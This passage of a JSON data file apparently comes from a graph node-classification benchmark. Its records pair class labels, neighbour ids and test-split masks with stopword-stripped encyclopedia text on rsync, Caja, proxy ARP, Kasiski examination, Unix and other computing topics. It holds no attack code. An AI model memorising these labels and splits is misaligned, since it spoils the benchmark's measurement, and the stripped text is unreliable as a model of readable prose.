checksum collisions avoids risk missing changed files cost reading every file present systems rsync utility uses algorithm invented australian computer programmer andrew tridgell efficiently transmitting structure file across communications link receiving computer already similar identical version structure recipient splits copy file chunks computes two checksums chunk md5 hash weaker easier compute 'rolling checksum sends checksums sender sender quickly computes rolling checksum chunk version file differ must sent 're sender uses computationally expensive md5 hash verify chunks sender sends recipient parts file match along information merge blocks recipient version makes copies identical small probability differences chunks sender recipient detected thus remain uncorrected 128 bits md5 plus 32 bits rolling checksum probability order rolling checksum used rsync based mark adler adler-32 checksum used zlib based fletcher checksum sender recipient versions file many sections common utility needs transfer relatively little data synchronize files typical data compression algorithms used files similar uncompressed may different compressed thus entire file need transferred compression programs gzip provide special rsyncable mode allows files efficiently rsynced ensuring local changes uncompressed file yield local changes compressed file rsync supports key features aid significantly data transfers backup include compression decompression data block block using zlib support protocols ssh stunnel utility uses rsync algorithm generate delta files difference file file b like utility diff different delta format delta file applied file turning file b similar patch utility rdiff works well binary files rdiff-backup maintained since 2009 maintains backup mirror file directory either locally remotely network another server rdiff-backup stores incremental rdiff deltas backup possible recreate backup point librsync library used rdiff independent implementation rsync algorithm use rsync network protocol share code rsync application used dropbox rdiff-backup duplicity utilities acrosync library independent cross-platform implementation rsync network protocol unlike librsync wire-compatible rsync protocol version 29 30 released reciprocal public license used commercial rsync software acrosync duplicity variation rdiff-backup allows backups without cooperation storage server simple storage services like amazon s3 works generating hashes block advance encrypting storing server retrieves incremental backup rest data also stored encrypted security purposes macos 10.5 later special codice_15 codice_16 switch allows retaining much hfs file metadata syncing two machines supporting feature achieved transmitting resource fork along data fork zsync rsync-like tool optimized many downloads per file version zsync used linux distributions ubuntu distributing fast changing beta iso image files zsync uses http protocol .zsync files pre-calculated rolling hash minimize server load yet permit diff transfer network optimization rclone open-source tool inspired rsync focuses exclusively cloud storage system providers supports 10 different providers provides rsync-like interface backup local data providers",
    "neighbors": [
      2432,
      10242,
      4355,
      260,
      5251,
      7685,
      10631,
      2568,
      6280,
      9484,
      4623,
      3218,
      5397,
      2198,
      3350,
      1049,
      922,
      9625,
      10269,
      5407,
      3744,
      35,
      6565,
      3366,
      10405,
      6319,
      7983,
      3889,
      8114,
      6330,
      956,
      4797,
      5566,
      5313,
      11201,
      7364,
      2887,
      9167,
      4561,
      3794,
      6993,
      10202,
      5339,
      865,
      5474,
      10977,
      11492,
      10341,
      10727,
      11112,
      9834,
      3692,
      5612,
      7409,
      3571,
      9844,
      10101,
      11509,
      3191,
      10489,
      6651,
      2940,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5483,
    "label": 3,
    "text": "Caja_project:caja project caja pronounced google project javascript implementation virtual iframes based principles object-capabilities caja takes javascript technically ecmascript 5 strict mode code html css input rewrites safe subset html css plus single javascript function free variables means way function modify object given reference object host page instead giving direct references dom objects host page typically gives references wrappers sanitize html proxy urls prevent redirecting page allows caja prevent certain phishing attacks prevent cross-site scripting attacks prevent downloading malware also since rewritten programs run frame host page allow one program export object reference another program inter-frame communication simply method invocation word caja spanish box safe bank idea caja safely contain javascript programs well capabilities-based javascript caja currently used google google sites google apps script products 2008 myspace yahoo allianz deployed early version caja later abandoned",
    "neighbors": [
      4096,
      8719,
      3600,
      7700,
      9244,
      8735,
      10284,
      5677,
      3633,
      10813,
      4171,
      4683,
      11343,
      3664,
      10835,
      84,
      603,
      8285,
      2658,
      5219,
      4198,
      3700,
      8821,
      6791,
      7816,
      5262,
      6800,
      11408,
      8854,
      10393,
      8858,
      6813,
      7841,
      3761,
      1203,
      5311,
      7359,
      7871,
      196,
      3269,
      3782,
      7884,
      10445,
      3795,
      4822,
      728,
      1240,
      8413,
      9949,
      6367,
      7396,
      236,
      10991,
      9970,
      7926,
      3836,
      256,
      259,
      5892,
      8455,
      10507,
      10009,
      4378,
      10525,
      798,
      7455,
      288,
      4901,
      11060,
      5431,
      7480,
      2875,
      10045,
      2880,
      11590,
      11592,
      11596,
      9039,
      11087,
      3409,
      339,
      9560,
      7515,
      10097,
      10614,
      7548,
      5503,
      1409,
      2945,
      4995,
      3462,
      2951,
      9610,
      5522,
      1427,
      5524,
      10645,
      1946,
      1435,
      11674,
      8605,
      3999,
      2978,
      10146,
      1959,
      3499,
      7595,
      438,
      9152,
      4034,
      4044,
      4048,
      4056,
      482,
      487,
      6632,
      9195,
      5100,
      9712,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 5484,
    "label": 2,
    "text": "Multiple_Console_Time_Sharing_System:multiple console time sharing system multiple console time sharing system mcts operating system developed general motors research laboratories 1970s control data corporation star-100 supercomputer mcts built support gm computer-aided design cad applications mcts based multics",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      9361,
      9366,
      11539,
      6296,
      25,
      10776,
      11667,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      9335,
      10333,
      10590,
      97,
      6242,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      6772,
      7285,
      2168,
      1147,
      9468,
      3197,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 5485,
    "label": 5,
    "text": "Mapping_of_Airline_Traffic_over_Internet_Protocol:mapping airline traffic internet protocol matip stands mapping airline traffic means airline reservation ticketing messaging traffic tcp/ip defined rfc 2351 makes use well-known ports 350 351 matip preferred classic airline traffic lines",
    "neighbors": [
      5472,
      6993
    ],
    "mask": "None"
  },
  {
    "node_id": 5486,
    "label": 5,
    "text": "Proxy_ARP:proxy arp proxy arp technique proxy device given network answers arp queries ip address network proxy aware location traffic destination offers mac address ostensibly final destination traffic directed proxy address typically routed proxy intended destination via another interface via tunnel process results node responding mac address arp request different ip address proxying purposes sometimes referred publishing typical uses proxy arp arp manipulation techniques basis protocols providing redundancy broadcast networks e.g. ethernet notably common address redundancy protocol virtual router redundancy protocol disadvantage proxy arp include scalability arp resolution proxy required every device routed manner reliability fallback mechanism present masquerading confusing environments proxy arp create dos attacks networks misconfigured example misconfigured router proxy arp ability receive packets destined hosts gives mac address response arp requests hosts/routers may ability correctly forward packets final destination thus blackholing traffic proxy arp hide device misconfigurations missing incorrect default gateway openbsd implements proxy arp",
    "neighbors": [
      7240,
      649,
      6153,
      8073,
      9868,
      6013,
      4238,
      592,
      10640,
      10833,
      7411,
      5749,
      5437,
      4734
    ],
    "mask": "Test"
  },
  {
    "node_id": 5487,
    "label": 4,
    "text": "Kasiski_examination:kasiski examination cryptanalysis kasiski examination also referred kasiski test kasiski method method attacking polyalphabetic substitution ciphers vigenère cipher first published friedrich kasiski 1863 seems independently discovered charles babbage early 1846 polyalphabetic substitution ciphers substitution alphabets chosen use keyword kasiski examination allows cryptanalyst deduce length keyword length keyword discovered cryptanalyst lines ciphertext n columns n length keyword column treated ciphertext monoalphabetic substitution cipher column attacked frequency analysis similarly rotor stream cipher machine used method may allow deduction length individual rotors kasiski examination involves looking strings characters repeated ciphertext strings three characters long examination successful distances consecutive occurrences strings likely multiples length keyword thus finding repeated strings narrows possible lengths keyword since take greatest common divisor distances reason test works repeated string occurs plaintext distance corresponding characters multiple keyword length keyword letters line way occurrences string example consider plaintext crypto repeated string distance occurrences 20 characters line plaintext 6-character keyword abcdef 6 divide 20 first instance crypto lines abcdef second instance lines cdefab two instances encrypt different ciphertexts kasiski examination reveal nothing however 5-character keyword abcde 5 divides 20 occurrences crypto line abcdea two instances encrypt ciphertext kasiski examination effective difficulty using kasiski examination lies finding repeated strings hard task perform manually computers make much easier however care still required since repeated strings may coincidence repeat distances misleading cryptanalyst rule coincidences find correct length course monoalphabetic ciphertexts result must cryptanalyzed kasiski actually used superimposition solve vigenère cipher started finding key length took multiple copies message laid one-above-another one shifted left length key kasiski observed column made letters encrypted single alphabet method equivalent one described perhaps easier picture modern attacks polyalphabetic ciphers essentially identical described one improvement coincidence counting instead looking repeating groups modern analyst would take two copies message lay one another modern analysts use computers description illustrates principle computer algorithms implement generalized method br br",
    "neighbors": [
      8674,
      9615,
      1105,
      9617,
      1941
    ],
    "mask": "Test"
  },
  {
    "node_id": 5488,
    "label": 8,
    "text": "Cozi:cozi cozi website mobile app intended help families stay organized features include allowing multiple family members manage schedules one account well organize update shopping to-do lists website founded robbie cape jan miksovsky two left microsoft company first product cozi central released september 25 2006 included family calendar shopping lists family messaging photo collage screensaver company based seattle washington cozi freemium version paid version called cozi gold cozi gold additional features include cozi contacts birthday tracker reminders mobile month view change notifications cozi acquired time inc. 2014 meredith corporation acquired time 2018 cozi moved parents network division june 5 2011 cozi set guinness world record longest line ducks row line stretched one mile made 17,782 rubber ducks",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5489,
    "label": 2,
    "text": "Simplenote:simplenote simplenote note-taking application markdown support addition cross-platform apps accessed via web browsers simplenote externally accessible api allowing clients written macos dashboard widget dashnote nvpy cross-platform simplenote client amongst others addition macos program notational velocity windows utility resophnotes also sync simplenote simplenote originally developed simperium 2008 simplenote premium introduced november 23 2009 removed ads added extra features syncing simplenote dropbox automattic acquired simperium simplenote january 24 2013 september automattic released android version later relaunched simplenote suspending premium service removing ads users may 2016 official client linux simplenote released automattic open sourced code ios android macos simplenote apps august 2016 making client apps open source application reviewed mac life reviewed book lifehacker guide working smarter faster better covered book business iphone ipad app development",
    "neighbors": [
      7459,
      6797,
      4623,
      3632,
      7983,
      119,
      11221,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 5490,
    "label": 4,
    "text": "Network_Access_Control:network access control network access control nac approach computer security attempts unify endpoint security technology antivirus host intrusion prevention vulnerability assessment user system authentication t. network access control nac computer computer network|networking solution uses set protocol computing |protocols define implement policy describes secure access network node networking |nodes devices initially attempt access network nac might integrate automatic remediation process fixing non-compliant nodes allowing access network systems allowing network infrastructure routers switches firewalls work together back office servers end user computing equipment ensure information system operating securely interoperability allowed basic form nac 802.1x standard network access control aims exactly name implies—control access computer networking|network policies including pre-admission endpoint security policy checks post-admission controls users devices go network computer connects computer network permitted access anything unless complies business defined policy including anti-virus protection level system update level configuration computer checked pre-installed software agent access resources remediate resolve update issues policy met computer able access network resources internet within policies defined nac system nac mainly used endpoint health checks often tied role-based access access network given according profile person results posture/health check example enterprise hr department could access hr department files role endpoint meets anti-virus minimums nac represents emerging category security products definition evolving controversial overarching goals concept distilled two prevailing designs nac based whether policies enforced end-stations gain access network former case called pre-admission nac end-stations inspected prior allowed network typical use case pre-admission nac would prevent clients out-of-date antivirus signatures talking sensitive servers alternatively post-admission nac makes enforcement decisions based user actions users provided access network fundamental idea behind nac allow network make access control decisions based intelligence end-systems manner network informed end-systems key design decision key difference among nac systems whether require software agent distributed agents|agent software report end-system characteristics whether use scanning network inventory techniques discern characteristics remotely nac matured software developers microsoft adopted approach providing network access protection|network access protection nap agent part windows 7 vista xp releases also nap compatible agents linux mac os x provide equal intelligence operating systems out-of-band systems agents distributed end-stations report information central console turn control switches enforce policy contrast inline solutions single-box solutions act internal firewalls hierarchical internetworking model|access-layer networks enforce policy out-of-band solutions advantage reusing existing infrastructure inline products easier deploy new networks may provide advanced network enforcement capabilities directly control individual packets wire however products agentless inherent advantages easier less risky out-of-band deployment use techniques provide inline effectiveness non-compliant devices enforcement required network operators deploy nac products expectation legitimate clients denied access network users never out-of-date patch levels nac would unnecessary nac solutions require mechanism remediate end-user problems deny access two common strategies remediation quarantine networks captive portal using nac mobile device|mobile deployment workers connect various wireless network throughout workday involves challenges present wired local area network|lan environment user denied access computer security|security concern productive use device lost impact ability complete job serve customer addition automated remediation takes seconds wired connection may take minutes slower wireless data connection bogging device mobile nac solution gives system administrators greater control whether remediate security concern lower-grade concern out-of-date antivirus software|antivirus signatures may result simple warning user serious issues may result quarantining device policies may set automated remediation pushing applying security patch computing |patches updates withheld device connected wi-fi faster connection working hours allows administrators appropriately balance need security goal keeping workers productive category computer network security",
    "neighbors": [
      7809,
      9603,
      1284,
      649,
      6282,
      2189,
      1303,
      2213,
      2985,
      11434,
      5433,
      6586,
      9146,
      5437,
      10175,
      7752,
      3796,
      4053,
      1242,
      9055,
      9442,
      5860,
      3944,
      4471,
      6904,
      2041,
      3580,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5491,
    "label": 4,
    "text": "Barracuda_Networks:barracuda networks barracuda networks inc. company providing security networking storage products based network appliances cloud services company security products include products protection email web surfing web hackers instant messaging threats spam spyware trojans viruses company networking storage products include web filtering load balancing application delivery controllers message archiving ng firewalls backup services data protection barracuda networks founded 2003 dean drako founding ceo michael perone zach levow company introduced barracuda spam virus firewall year 2007 company moved headquarters campbell california opened office ann arbor michigan january 2006 closed first outside investment 40 million sequoia capital francisco partners january 29 2008 barracuda networks sued trend micro use open source anti-virus software clam antivirus trend micro claimed violation patent 'anti-virus detection smtp ftp gateway addition providing samples prior art effort render trend micro patent invalid july 2008 barracuda launched countersuit trend micro claiming trend micro violated several antivirus patents barracuda networks acquired ibm december 2008 company launched brbl barracuda reputation block list proprietary dynamic list known spam servers free public use blocking spam gateway soon opening brbl many ip addresses got blacklisted without apparent reason without technical explanation october 2009 barracuda 85,000 customers november 2011 barracuda 130,000 customers january 2014 barracuda 150,000 customers worldwide 2012 company became co-sponsor garmin-barracuda uci protour cycling team entitlement sponsor 2011 indianapolis 500 champion bryan herta autosport indycar series 98 lotus driven alex tagliani defend team championship barracuda networks expanded research development facility ann arbor 12,500 square foot office building depot street 2008 2012 michigan-based research division grown 180 employees outgrowing space june 2012 barracuda signed lease occupy 45,000 square foot office complex previously used borders headquarters maynard st downtown ann arbor july 2012 dean drako barracuda networks co-founder president ceo since founded 2003 resigned operating position remaining company board directors time drako departure company stated achieved profitability nearly ongoing 30 annual percent growth rate since inception 150,000 customers worldwide nearly 1,000 employees 10 offices business 80 countries company created office ceo started ceo search november 2012 long-time emc executive william bj jenkins joined company president ceo jenkins worked emc since 1998 recently served president emc backup recovery systems brs division november 2013 barracuda networks went public new york stock exchange ticker symbol cuda march 2015 barracuda networks expanded business north asia distributed tritech distribution limited hong kong november 2015 barracuda added new next generation firewall firewall family barracuda announced future discontinuation copy cudadrive services may 2016 november 2017 thoma bravo llc private equity firm announced taking barracuda networks private 1.6 billion buyout expected go feb 2018 february 2018 thoma bravo announced completed acquisition may 23 2019 barracuda forays next generation security tackle latest cyber security threats introducing advanced bot protection capabilities september 2007 barracuda networks acquired netcontinuum company providing application controllers secure manage enterprise web applications november 2008 barracuda networks expanded cloud-based backup services acquiring bitleap november 2008 barracuda networks acquired 3sp allowing company introduce secure sockets layer ssl virtual private network vpn products allow secure remote access network file shares internal web sites remote control capabilities desktops servers january 2009 barracuda networks acquired yosemite technologies add software agents incremental backups applications microsoft exchange server sql server windows system states september 2009 barracuda networks acquired controlling interest phion ag austria-based public company delivering enterprise-class firewalls october 2009 barracuda networks acquired purewire inc software service saas company offering cloud based web filtering security april 2013 barracuda networks acquired signnow 2014 barracuda networks purchased c2c systems uk october 2015 barracuda networks acquired intronis november 2017 barracuda purchased sonian november 2017 barracuda announced acquired private equity investment firm thoma bravo llc january 2018 barracuda acquired phishline january 2013 backdoor discovered variety firewall vpn spam filtering gear sold barracuda networks contains undocumented backdoor accounts allow people remotely log access sensitive information researchers austrian security firm warned backdoor secured shortly announcement",
    "neighbors": [
      899,
      10756,
      1801,
      11030,
      10392,
      3619,
      6565,
      3366,
      8998,
      3885,
      1970,
      6579,
      9530,
      7739,
      64,
      9025,
      2118,
      331,
      467,
      2395,
      4956,
      11104,
      6514,
      5749,
      3323,
      8446,
      2558,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 5492,
    "label": 2,
    "text": "Unix:unix unix trademarked unix family multitasking multiuser computer operating systems derive original unix development starting 1970s bell labs research center ken thompson dennis ritchie others initially intended use inside bell system licensed unix outside parties late 1970s leading variety academic commercial unix variants vendors including university california berkeley bsd microsoft xenix ibm aix sun microsystems solaris early 1990s sold rights unix novell sold unix business santa cruz operation sco 1995 unix trademark passed open group neutral industry consortium allows use mark certified operating systems comply single unix specification sus 2014 unix version largest installed base apple macos unix systems characterized modular design sometimes called unix philosophy concept entails operating system provides set simple tools performs limited well-defined function unified filesystem unix filesystem main means communication shell scripting command language unix shell combine tools perform complex workflows unix distinguishes predecessors first portable operating system almost entire operating system written c programming language thus allowing unix reach numerous platforms unix originally meant convenient platform programmers developing software run systems rather non-programmers system grew larger operating system started spreading academic circles users added tools system shared colleagues first unix designed portable multi-tasking later unix gradually gained portability multi-tasking multi-user capabilities time-sharing configuration unix systems characterized various concepts use plain text storing data hierarchical file system treating devices certain types inter-process communication ipc files use large number software tools small programs strung together command-line interpreter using pipes opposed using single monolithic program includes functionality concepts collectively known unix philosophy brian kernighan rob pike summarize unix programming environment idea power system comes relationships among programs programs era standard computer consisted hard disk storage data terminal input output i/o unix file model worked quite well i/o generally linear 1980s non-blocking i/o set inter-process communication mechanisms augmented unix domain sockets shared memory message queues semaphores well network sockets support communication hosts graphical user interfaces developed file model proved inadequate task handling asynchronous events generated mouse early 1980s users began seeing unix potential universal operating system suitable computers sizes unix environment client–server program model essential elements development internet reshaping computing centered networks rather individual computers unix c programming language developed distributed government academic institutions led ported wider variety machine families operating system unix operating system consists many libraries utilities along master control program kernel kernel provides services start stop programs handles file system common low-level tasks programs share schedules access avoid conflicts programs try access resource device simultaneously mediate access kernel special rights reflected division user space kernel space — although microkernel implementations like minix redox functions network protocols may also run user space origins unix date back mid-1960s massachusetts institute technology bell labs general electric developing multics time-sharing operating system ge-645 mainframe computer multics featured several innovations also presented severe problems frustrated size complexity multics goals individual researchers bell labs started withdrawing project last leave ken thompson dennis ritchie douglas mcilroy joe ossanna decided reimplement experiences new project smaller scale new operating system initially without organizational backing also without name new operating system single-tasking system 1970 group coined name unics uniplexed information computing service pronounced eunuchs pun multics stood multiplexed information computer services brian kernighan takes credit idea adds one remember origin final spelling unix dennis ritchie doug mcilroy peter g. neumann also credit kernighan operating system originally written assembly language 1973 version 4 unix rewritten c. version 4 unix however still many pdp-11 dependent codes suitable porting first port platform made five years later 1978 interdata 8/32 bell labs produced several versions unix collectively referred research unix 1975 first source license unix sold donald b. gillies university illinois department computer science uiuc graduate student greg chesson worked unix kernel bell labs instrumental negotiating terms license late 1970s early 1980s influence unix academic circles led large-scale adoption unix bsd system v commercial startups including sequent hp-ux solaris aix xenix late 1980s unix system laboratories sun microsystems developed system v release 4 svr4 subsequently adopted many commercial unix vendors 1990s unix unix-like systems grew popularity bsd linux distributions developed collaboration worldwide network programmers 2000 apple released darwin also unix system became core mac os x operating system later renamed macos unix operating systems widely used modern servers workstations mobile devices late 1980s open operating system standardization effort known posix provided common baseline operating systems ieee based posix around common structure major competing variants unix system publishing first posix standard 1988 early 1990s separate similar effort started industry consortium common open software environment cose initiative eventually became single unix specification sus administered open group starting 1998 open group ieee started austin group provide common definition posix single unix specification 2008 become open group base specification 1999 effort towards compatibility several unix system vendors agreed svr4 executable linkable format elf standard binary object code files common format allows substantial binary compatibility among different unix systems operating cpu architecture filesystem hierarchy standard created provide reference directory layout unix-like operating systems mainly used linux unix system composed several components originally packaged together including development environment libraries documents portable modifiable source code components addition kernel operating system unix self-contained software system one key reasons emerged important teaching learning tool broad influence inclusion components make system large original v7 unix distribution consisting copies compiled binaries plus source code documentation occupied less 10 mb arrived single nine-track magnetic tape printed documentation typeset online sources contained two volumes names filesystem locations unix components changed substantially across history system nonetheless v7 implementation considered many canonical early structure unix system significant impact operating systems achieved reputation interactivity providing software nominal fee educational use running inexpensive hardware easy adapt move different machines unix originally written assembly language soon rewritten c high-level programming language although followed lead multics burroughs unix popularized idea unix drastically simplified file model compared many contemporary operating systems treating kinds files simple byte arrays file system hierarchy contained machine services devices printers terminals disk drives providing uniform interface expense occasionally requiring additional mechanisms ioctl mode flags access features hardware fit simple stream bytes model plan 9 operating system pushed model even eliminated need additional mechanisms unix also popularized hierarchical file system arbitrarily nested subdirectories originally introduced multics common operating systems era ways divide storage device multiple directories sections fixed number levels often one level several major proprietary operating systems eventually added recursive subdirectory capabilities also patterned multics dec rsx-11m group user hierarchy evolved vms directories cp/m volumes evolved ms-dos 2.0+ subdirectories hp mpe group.account hierarchy ibm ssp os/400 library systems folded broader posix file systems making command interpreter ordinary user-level program additional commands provided separate programs another multics innovation popularized unix unix shell used language interactive commands scripting shell scripts – separate job control language like ibm jcl since shell os commands another program user could choose even write shell new commands could added without changing shell unix innovative command-line syntax creating modular chains producer-consumer processes pipelines made powerful programming paradigm coroutines widely available many later command-line interpreters inspired unix shell fundamental simplifying assumption unix focus newline-delimited text nearly file formats binary editors original version unix – entire system configured using textual shell command scripts common denominator i/o system byte – unlike record-based file systems focus text representing nearly everything made unix pipes especially useful encouraged development simple general tools could easily combined perform complicated ad hoc tasks focus text bytes made system far scalable portable systems time text-based applications also proven popular application areas printing languages postscript odf application layer internet protocols e.g. ftp smtp http soap sip unix popularized syntax regular expressions found widespread use unix programming interface became basis widely implemented operating system interface standard posix see c programming language soon spread beyond unix ubiquitous systems applications programming early unix developers important bringing concepts modularity reusability software engineering practice spawning software tools movement time leading developers unix programs ran established set cultural norms developing software norms became important influential technology unix termed unix philosophy tcp/ip networking protocols quickly implemented unix versions widely used relatively inexpensive computers contributed internet explosion worldwide real-time connectivity formed basis implementations many platforms unix policy extensive on-line documentation many years ready access system source code raised programmer expectations contributed launch free software movement 1983 1983 richard stallman announced gnu short gnu unix project ambitious effort create free software unix-like system free sense everyone received copy would free use study modify redistribute gnu project kernel development project gnu hurd yet produced working kernel 1991 linus torvalds released linux kernel free software gnu general public license addition use linux operating system many gnu packages – gnu compiler collection rest gnu toolchain gnu c library gnu core utilities – gone play central roles free unix systems well linux distributions consisting linux kernel large collections compatible software become popular individual users business popular distributions include red hat enterprise linux fedora suse linux enterprise opensuse debian gnu/linux ubuntu linux mint mandriva linux slackware linux arch linux gentoo free derivative bsd unix 386bsd released 1992 led netbsd freebsd projects 1994 settlement lawsuit brought university california berkeley software design inc. usl v. bsdi unix systems laboratories clarified berkeley right distribute bsd unix free desired since bsd unix developed several different product branches including openbsd dragonfly bsd linux bsd increasingly filling market needs traditionally served proprietary unix operating systems well expanding new markets consumer desktop mobile embedded devices modular design unix model sharing components relatively common consequently unix unix-like systems include least bsd code systems also include gnu utilities distributions 1999 interview dennis ritchie voiced opinion linux bsd operating systems continuation basis unix design derivatives unix interview states views unix linux continuation ideas started ken many others many years ago opensolaris open-source counterpart solaris developed sun microsystems included cddl-licensed kernel primarily gnu userland however oracle discontinued project upon acquisition sun prompted group former sun employees members opensolaris community fork opensolaris illumos kernel 2014 illumos remains active open-source system v derivative may 1975 rfc 681 described development network unix center advanced computation university illinois system said present several interesting capabilities arpanet mini-host time unix required license bell laboratories 20,000 us expensive non-university users educational license cost 150 noted bell open suggestions arpanet-wide license specific features found beneficial local processing facilities compilers editors document preparation system efficient file system access control mountable unmountable volumes unified treatment peripherals special files integration network control program ncp within unix file system treatment network connections special files accessed standard unix i/o calls closing files program exit decision desirable minimize amount code added basic unix kernel october 1993 novell company owned rights unix system v source time transferred trademarks unix x/open company open group 1995 sold related business operations santa cruz operation sco whether novell also sold copyrights actual software subject federal lawsuit 2006 sco v. novell novell case appealed august 30 2011 united states court appeals tenth circuit affirmed trial decisions closing case unix vendor sco group inc. accused novell slander title present owner trademark unix open group industry standards consortium systems fully compliant certified single unix specification qualify unix others called unix-like decree open group term unix refers class operating systems specific implementation operating system operating systems meet open group single unix specification able bear unix 98 unix 03 trademarks today operating system vendor pays substantial certification fee annual trademark royalties open group systems licensed use unix trademark include aix hp-ux inspur k-ux irix solaris tru64 unix formerly digital unix osf/1 macos part z/os notably inspur k-ux linux distribution certified unix 03 compliant sometimes representation like un*x *nix *n x used indicate operating systems similar unix comes use asterisk question mark characters wildcard indicators many utilities notation also used describe unix-like systems met requirements unix branding open group open group requests unix always used adjective followed generic term system help avoid creation genericized trademark unix original formatting usage unix remains widespread typeset small caps unix according dennis ritchie presenting original unix paper third operating systems symposium american association computing machinery acm new typesetter troff invented intoxicated able produce small caps many operating system predecessors contemporaries used all-uppercase lettering many people wrote name upper case due force habit acronym trademark names registered different entities different countries trademark laws countries allow trademark name controlled two different entities entity uses trademark easily distinguishable categories result unix used brand name various products including book shelves ink pens bottled glue diapers hair driers food containers several plural forms unix used casually refer multiple brands unix unix-like systems common conventional unixes unices treating unix latin noun third declension also popular pseudo-anglo-saxon plural form unixen common although occasionally seen sun microsystems developer solaris variant asserted term unix plural referencing many implementations",
    "neighbors": [
      2050,
      2051,
      6148,
      4106,
      6155,
      8204,
      13,
      2062,
      8207,
      10259,
      8213,
      25,
      2073,
      10271,
      8225,
      6180,
      8236,
      4144,
      10289,
      8243,
      4151,
      6201,
      10298,
      10304,
      8258,
      8260,
      2118,
      8262,
      2120,
      4170,
      6218,
      8266,
      6221,
      10318,
      8273,
      10322,
      2132,
      93,
      10333,
      96,
      97,
      8290,
      6245,
      10341,
      6248,
      8296,
      8298,
      107,
      2155,
      8303,
      8304,
      113,
      8306,
      10352,
      118,
      119,
      2168,
      4219,
      2172,
      2179,
      132,
      6281,
      142,
      10382,
      4242,
      10387,
      8340,
      2198,
      10391,
      6296,
      2201,
      8350,
      4255,
      6304,
      2211,
      165,
      2224,
      8369,
      178,
      2227,
      8373,
      2231,
      6329,
      8378,
      10425,
      188,
      8388,
      2245,
      6342,
      10436,
      2248,
      2253,
      8399,
      6352,
      6356,
      2262,
      6358,
      2266,
      8410,
      8414,
      225,
      6369,
      6377,
      2282,
      6378,
      10476,
      2287,
      242,
      2291,
      8435,
      10484,
      10486,
      4345,
      8441,
      2301,
      4349,
      2303,
      10499,
      6412,
      270,
      273,
      274,
      4369,
      8469,
      8474,
      284,
      287,
      292,
      6437,
      2345,
      6445,
      4398,
      4402,
      2355,
      8499,
      310,
      311,
      8502,
      2361,
      4409,
      2363,
      6459,
      8504,
      6464,
      10561,
      10564,
      8517,
      4423,
      8522,
      8524,
      4433,
      6491,
      349,
      6493,
      2399,
      10590,
      10592,
      10596,
      8551,
      8553,
      10611,
      376,
      2424,
      6523,
      381,
      2430,
      8573,
      6528,
      10623,
      8582,
      8583,
      394,
      4492,
      8597,
      6550,
      2457,
      413,
      414,
      2462,
      10654,
      8612,
      421,
      4519,
      6568,
      4521,
      426,
      8618,
      4525,
      6573,
      2479,
      10670,
      4532,
      2485,
      8628,
      8631,
      8632,
      8633,
      10676,
      2494,
      451,
      6596,
      4550,
      4553,
      6601,
      10698,
      6606,
      463,
      4561,
      4562,
      4563,
      470,
      471,
      472,
      2519,
      2520,
      475,
      2521,
      477,
      2525,
      6617,
      6620,
      6624,
      8671,
      8675,
      486,
      2534,
      10727,
      8682,
      491,
      10730,
      4589,
      10731,
      8687,
      10732,
      8692,
      6647,
      506,
      10747,
      8700,
      2560,
      10752,
      10753,
      515,
      6661,
      6664,
      521,
      6675,
      6677,
      8725,
      10774,
      2584,
      8729,
      10776,
      4637,
      8737,
      4643,
      2599,
      10791,
      2603,
      557,
      2610,
      8754,
      10803,
      2616,
      10809,
      573,
      2621,
      10815,
      576,
      2625,
      8770,
      8771,
      4679,
      6727,
      4684,
      6735,
      592,
      593,
      6743,
      8791,
      10841,
      2651,
      2652,
      607,
      2656,
      4707,
      10851,
      6760,
      10856,
      2666,
      2670,
      623,
      8816,
      4721,
      6772,
      4727,
      633,
      634,
      2684,
      639,
      640,
      6787,
      10883,
      10891,
      6797,
      4750,
      8846,
      2704,
      8852,
      6808,
      667,
      6812,
      2717,
      670,
      671,
      6813,
      8871,
      10921,
      8876,
      6831,
      8879,
      692,
      6837,
      10933,
      8889,
      10937,
      700,
      6846,
      708,
      6852,
      6854,
      4815,
      8911,
      8913,
      722,
      6866,
      4822,
      10967,
      6879,
      2786,
      741,
      742,
      6888,
      4841,
      8937,
      8944,
      753,
      4850,
      2804,
      757,
      4857,
      8954,
      2811,
      4859,
      2813,
      11011,
      6916,
      11013,
      8966,
      2825,
      780,
      8975,
      11023,
      8977,
      786,
      787,
      8978,
      789,
      791,
      2839,
      6935,
      8991,
      8998,
      4903,
      8999,
      4907,
      4910,
      817,
      823,
      4919,
      6969,
      9019,
      11068,
      6975,
      11074,
      6979,
      9027,
      11075,
      2887,
      2888,
      6986,
      6988,
      2895,
      2903,
      863,
      866,
      868,
      9060,
      4968,
      873,
      11112,
      7019,
      7020,
      2925,
      2933,
      890,
      7039,
      900,
      4996,
      11145,
      7053,
      5008,
      7057,
      11153,
      2966,
      2967,
      9114,
      5022,
      9119,
      929,
      932,
      5029,
      7076,
      935,
      5032,
      9128,
      7083,
      5036,
      11184,
      2995,
      11188,
      9141,
      950,
      9142,
      7101,
      11198,
      9151,
      11204,
      965,
      11205,
      9166,
      11218,
      981,
      5078,
      5080,
      11227,
      7134,
      7135,
      5093,
      9194,
      3051,
      11245,
      5105,
      5106,
      11249,
      9204,
      3062,
      5110,
      11257,
      5115,
      11269,
      9231,
      7187,
      7188,
      5142,
      11287,
      3096,
      3098,
      7196,
      5156,
      7204,
      5158,
      9257,
      7217,
      5171,
      7224,
      5179,
      3134,
      1100,
      5196,
      9298,
      7255,
      1112,
      3160,
      11351,
      3167,
      11359,
      1121,
      3169,
      3170,
      3172,
      7269,
      11363,
      7277,
      5230,
      3183,
      9330,
      7285,
      3191,
      9335,
      1147,
      3197,
      1150,
      5247,
      1152,
      11390,
      5251,
      7301,
      3206,
      7302,
      5256,
      3209,
      7303,
      7307,
      7309,
      3214,
      5264,
      9361,
      11413,
      3222,
      9366,
